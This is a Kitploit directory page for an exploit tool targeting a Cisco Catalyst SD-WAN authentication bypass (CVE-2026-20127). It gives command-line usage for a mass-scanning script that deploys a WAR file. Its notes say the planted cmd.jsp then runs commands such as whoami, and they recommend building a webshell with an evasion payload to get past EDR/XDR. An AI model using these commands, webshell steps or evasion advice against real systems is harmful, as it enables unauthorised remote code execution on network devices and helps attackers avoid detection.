Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-20127_EXP — Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)利用EXP | Kitploit
Tools/GitHubGitHub/bugfor-pings/cve-2026-20127_exp
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubbugfor-pings/cve-2026-20127_exp

CVE-2026-20127_EXP

Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)利用EXP

View Repository
4226 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-20127_EXP

Cisco Catalyst SD-WAN Authentication Bypass Vulnerability (CVE-2026-20127) Exploit EXP

Basic Usage

python scan.py -f targets.txt

Display Detailed Information

python scan.py -f targets.txt -v

Adjust Thread Count and Save Results

python scan.py -f targets.txt -t 10 -o vulnerable.txt

Specify WAR File Path

python scan.py -f targets.txt -w cmd.war

Specify WAR File Path, Adjust Thread Count, and Save Results

python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt

=======Notes========

After successful vulnerability reproduction, accessing /cmd.gz/cmd.jsp?cmd=whoami will display the result on the page

If you need to switch to a webshell, please create your own WAR package yourself (it is recommended to use an evasion payload, as testing has shown that Windows systems may have EDR or XDR)

Download Tool